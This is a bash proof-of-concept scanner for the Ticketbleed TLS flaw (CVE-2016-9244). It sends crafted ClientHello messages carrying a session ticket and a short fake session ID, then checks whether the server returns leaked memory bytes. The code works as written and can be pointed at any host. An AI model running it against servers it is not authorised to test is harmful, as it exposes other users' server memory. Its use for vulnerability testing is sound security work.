#!/bin/bash # Fast and reliable POC bash socket implementation of ticketbleed (CVE-2016-9244), see also http://ticketbleed.com/ # Author: Dirk Wetter, GPLv2 see https://testssl.sh/LICENSE.txt # # sockets inspired by http://blog.chris007.de/?p=238 # ticketbleed inspired by https://blog.filippo.io/finding-ticketbleed/ # ###### DON'T DO EVIL! USAGE AT YOUR OWN RISK. DON'T VIOLATE LAWS! ####### [[ -z "$1" ]] && echo "IP is missing" && exit 1 readonly PS4='${LINENO}: ${FUNCNAME[0]:+${FUNCNAME[0]}(): }' OPENSSL=${OPENSSL:-$(type -p openssl)} TIMEOUT=${TIMEOUT:-20} # insert some hexspeak here :-) SID="x00,x00,x0B,xAD,xC0,xDE," # don't forget the trailing comma NODE="$1" PORT="${NODE#*:}" PORT="${PORT-443}" # probably this doesn't make sense NODE="${NODE%:*}" # strip port if supplied TLSV=${2:-01} # TLS 1.0=x01 1.1=0x02, 1.2=0x3 MAXSLEEP=$TIMEOUT SOCKREPLY="" COL_WIDTH=32 DEBUG=${DEBUG:-"false"} HELLO_READBYTES=${HELLO_READBYTES:-65535} dec2hex() { printf "x%02x" "$1"; } dec2hexB() { a=$(printf "%04x" "$1") printf "x%02s, x%02s" "${a:0:2}" "${a:2:2}" } LEN_SID=$(( ${#SID} / 4)) # the real length in bytes XLEN_SID="$(dec2hex $LEN_SID)" red=$(tput setaf 1; tput bold) green=$(tput bold; tput setaf 2) lgreen=$(tput setaf 2) brown=$(tput setaf 3) blue=$(tput setaf 4) magenta=$(tput setaf 5) cyan=$(tput setaf 6) grey=$(tput setaf 7) yellow=$(tput setaf 3; tput bold) normal=$(tput sgr0) send_clienthello() { local -i len_ch=216 # len of clienthello, exlcuding TLS session ticket and SID (record layer) local session_tckt_tls="$1" local -i len_tckt_tls="${#1}" local xlen_tckt_tls="" len_tckt_tls=$(( len_tckt_tls / 4)) xlen_tckt_tls="$(dec2hex $len_tckt_tls)" local len_handshake_record_layer="$(( LEN_SID + len_ch + len_tckt_tls ))" local xlen_handshake_record_layer="$(dec2hexB "$len_handshake_record_layer")" local len_handshake_ssl_layer="$(( len_handshake_record_layer + 4 ))" local xlen_handshake_ssl_layer="$(dec2hexB "$len_handshake_ssl_layer")" if $DEBUG; then echo "len_tckt_tls (hex): $len_tckt_tls ($xlen_tckt_tls)" echo "SID: $SID" echo "LEN_SID (XLEN_SID) $LEN_SID ($XLEN_SID)" echo "len_handshake_record_layer: $len_handshake_record_layer ($xlen_handshake_record_layer)" echo "len_handshake_ssl_layer: $len_handshake_ssl_layer ($xlen_handshake_ssl_layer)" echo "session_tckt_tls: $session_tckt_tls" fi client_hello=" # TLS header (5 bytes) ,x16, # Content type (x16 for handshake) x03, x01, # TLS Version # Length Secure Socket Layer follow: $xlen_handshake_ssl_layer, # Handshake header x01, # Type (x01 for ClientHello) # Length of client hello follows: x00, $xlen_handshake_record_layer, x03, x$TLSV, # TLS Version # Random (32 byte) Unix time etc, see www.moserware.com/2009/06/first-few-milliseconds-of-https.html xee, xee, x5b, x90, x9d, x9b, x72, x0b, xbc, x0c, xbc, x2b, x92, xa8, x48, x97, xcf, xbd, x39, x04, xcc, x16, x0a, x85, x03, x90, x9f, x77, x04, x33, xff, xff, $XLEN_SID, # Session ID length $SID x00, x66, # Cipher suites length # Cipher suites (51 suites) xc0, x14, xc0, x0a, xc0, x22, xc0, x21, x00, x39, x00, x38, x00, x88, x00, x87, xc0, x0f, xc0, x05, x00, x35, x00, x84, xc0, x12, xc0, x08, xc0, x1c, xc0, x1b, x00, x16, x00, x13, xc0, x0d, xc0, x03, x00, x0a, xc0, x13, xc0, x09, xc0, x1f, xc0, x1e, x00, x33, x00, x32, x00, x9a, x00, x99, x00, x45, x00, x44, xc0, x0e, xc0, x04, x00, x2f, x00, x96, x00, x41, xc0, x11, xc0, x07, xc0, x0c, xc0, x02, x00, x05, x00, x04, x00, x15, x00, x12, x00, x09, x00, x14, x00, x11, x00, x08, x00, x06, x00, x03, x00, xff, x01, # Compression methods length x00, # Compression method (x00 for NULL) x01, x0b, # Extensions length # Extension: ec_point_formats x00, x0b, x00, x04, x03, x00, x01, x02, # Extension: elliptic_curves x00, x0a, x00, x34, x00, x32, x00, x0e, x00, x0d, x00, x19, x00, x0b, x00, x0c, x00, x18, x00, x09, x00, x0a, x00, x16, x00, x17, x00, x08, x00, x06, x00, x07, x00, x14, x00, x15, x00, x04, x00, x05, x00, x12, x00, x13, x00, x01, x00, x02, x00, x03, x00, x0f, x00, x10, x00, x11, # Extension: SessionTicket TLS x00, x23, # length of SessionTicket TLS x00, $xlen_tckt_tls, # Session Ticket $session_tckt_tls # here we have the comma already # Extension: Heartbeat x00, x0f, x00, x01, x01" msg=$(echo "$client_hello" | sed -e 's/# .*$//g' -e 's/ //g' | sed -E 's/^[[:space:]]+//; s/[[:space:]]+$//; /^$/d' | sed 's/,/\\/g' | tr -d '\n') socksend "$msg" $TLSV } parse_hn_port() { # strip "https", supposed it was supplied additionally grep -q 'https://' <<< "$NODE" && NODE="$(sed -e 's/https\:\/\///' <<< "$NODE")" # strip trailing urlpath NODE=$(sed -e 's/\/.*$//' <<< "$NODE") # determine port, supposed it was supplied additionally grep -q ':' <<< "$NODE" && PORT=$(sed 's/^.*\://' <<< "$NODE") && NODE=$(sed 's/\:.*$//' <<< "$NODE") } wait_kill(){ pid=$1 maxsleep=$2 while true; do if ! ps $pid >/dev/null ; then return 0 # didn't reach maxsleep yet fi sleep 1 maxsleep=$((maxsleep - 1)) test $maxsleep -eq 0 && break done # needs to be killed kill $pid >&2 2>/dev/null wait $pid 2>/dev/null return 3 # killed } socksend() { local len data="$(echo -n $1)" if "$DEBUG"; then echo "\"$data\"" len=$(( $(wc -c <<< "$data") / 4 )) echo -n "length: $len / " dec2hexB $len echo fi echo -en "$data" >&5 } sockread_nonblocking() { [[ "x$2" == "x" ]] && maxsleep=$MAXSLEEP || maxsleep=$2 ret=0 SOCKREPLY="$(dd bs=$1 count=1 <&5 2>/dev/null | hexdump -v -e '16/1 "%02X"')" & wait_kill $! $maxsleep ret=$? echo -n -e "$SOCKREPLY" # this doesn't work as the SOCKREPLY above belngs to a bckgnd process return $ret } sockread() { dd bs=$1 count=1 <&5 2>/dev/null | hexdump -v -e '16/1 "%02X"' } fixme(){ tput bold; tput setaf 5; echo -e "\n$1\n"; tput sgr0 } fd_socket(){ if ! exec 5<> /dev/tcp/$NODE/$PORT; then echo "$(basename $0): unable to connect to $NODE:$PORT" exit 2 fi } close_socket(){ exec 5<&- exec 5>&- return 0 } cleanup() { close_socket echo echo return 0 } get_sessticket() { local sessticket_str local output output="$($OPENSSL s_client -connect $NODE:$PORT </dev/null 2>/dev/null)" if ! grep -qw CONNECTED <<< "$output"; then return 1 else sessticket_str="$(awk '/TLS session ticket:/,/^$/' <<< "$output" | awk '!/TLS session ticket/')" sessticket_str="$(sed -e 's/^.* - /x/g' -e 's/ .*$//g' <<< "$sessticket_str" | tr '\n' ',')" sed -e 's/ /,x/g' -e 's/-/,x/g' <<< "$sessticket_str" return 0 fi } #### main parse_hn_port "$1" early_exit=true declare -a memory sid_detected nr_sid_detected=0 # there are different "timeout". Check whether --preserve-status is supported if type -p timeout &>/dev/null ; then if timeout --help 2>/dev/null | grep -q 'preserve-status'; then OPENSSL="timeout --preserve-status $TIMEOUT $OPENSSL" else OPENSSL="timeout $TIMEOUT $OPENSSL" fi else echo " binary \"timeout\" not found. Continuing without it" unset TIMEOUT fi echo "$DEBUG" && ( echo ) echo "##### 1) Connect to determine 1x session ticket TLS" # attn! neither here nor in the following client hello we do SNI. Assuming this is a vulnebilty of the TLS implementation SESS_TICKET_TLS="$(get_sessticket)" if [[ $? -ne 0 ]]; then echo >&2 echo -e "$NODE:$PORT ${magenta}not reachable / no TLS${normal}\n " >&2 exit 0 fi [[ "$SESS_TICKET_TLS" == "," ]] && echo -e "${green}OK, not vulnerable${normal}, no session tickets\n" && exit 0 trap "cleanup" QUIT EXIT "$DEBUG" && ( echo; echo ) echo "##### 2) Sending 1 to 3 ClientHello(s) (TLS version 03,$TLSV) with this ticket and a made up SessionID" # we do 3 client hellos, and see whether different memmory is returned for i in 1 2 3; do fd_socket $PORT "$DEBUG" && echo "$i" send_clienthello "$SESS_TICKET_TLS" "$DEBUG" && ( echo; echo ) [[ "$i" -eq 1 ]] && echo "##### Reading server replies ($HELLO_READBYTES bytes)" && echo SOCKREPLY=$(sockread $HELLO_READBYTES) if "$DEBUG"; then echo "=============================" echo "$SOCKREPLY" echo "=============================" fi if [[ "${SOCKREPLY:0:2}" == "15" ]]; then echo -n "TLS Alert ${SOCKREPLY:10:4} (TLS version: ${SOCKREPLY:2:4}) -- " echo "${green}OK, not vulnerable ${normal} (TLS alert)" break elif [[ -z "${SOCKREPLY:0:2}" ]]; then echo "${green}OK, not vulnerable ${normal} (zero reply)" break elif [[ "${SOCKREPLY:0:2}" == "16" ]]; then # we need to look into this as some servers just respond as if nothing happened early_exit=false "$DEBUG" && echo -n "Handshake (TLS version: ${SOCKREPLY:2:4}), " if [[ "${SOCKREPLY:10:6}" == 020000 ]]; then echo -n " ServerHello $i -- " else echo -n " Message type: ${SOCKREPLY:10:6} -- " fi sid_input=$(sed -e 's/x//g' -e 's/,//g' <<< "$SID") sid_detected[i]="${SOCKREPLY:88:32}" memory[i]="${SOCKREPLY:$((88+ len_sid*2)):$((32 - len_sid*2))}" if "$DEBUG"; then echo echo "TLS version, record layer: ${SOCKREPLY:18:4}" #echo "Random bytes / timestamp: ${SOCKREPLY:22:64}" echo "memory: ${memory[i]}" echo "Session ID: ${sid_detected[i]}" fi if grep -q $sid_input <<< "${sid_detected[i]}"; then #echo -n " (${yellow}Session ID${normal}, ${red}mem returned${normal} --> " echo -n "${sid_detected[i]}" | sed -e "s/$sid_input/${grey}$sid_input${normal}${blue}/g" echo "${normal})" else echo -n "not expected server reply but likely not vulnerable" fi else echo "TLS record ${SOCKREPLY:0:2} replied" echo -n "Strange server reply, pls report" break fi done echo if ! "$early_exit"; then # here we test the replies if a TLS server hello was received >1x for i in 1 2 3 ; do if grep -q $sid_input <<< "${sid_detected[i]}"; then # was our faked TLS SID returned? nr_sid_detected=$((nr_sid_detected + 1)) fi done if [[ $nr_sid_detected -eq 3 ]]; then if [[ ${memory[1]} != ${memory[2]} ]] && [[ ${memory[2]} != ${memory[3]} ]]; then echo "${red}VULNERABLE!${normal}, real memory returned" else echo "${green}not vulnerable ${normal} (same memory fragments returned)" fi else echo "results ($nr_sid_detected of 3) are kind of fishy. If it persist, let Dirk know" fi fi exit 0 # vim:ts=5:sw=5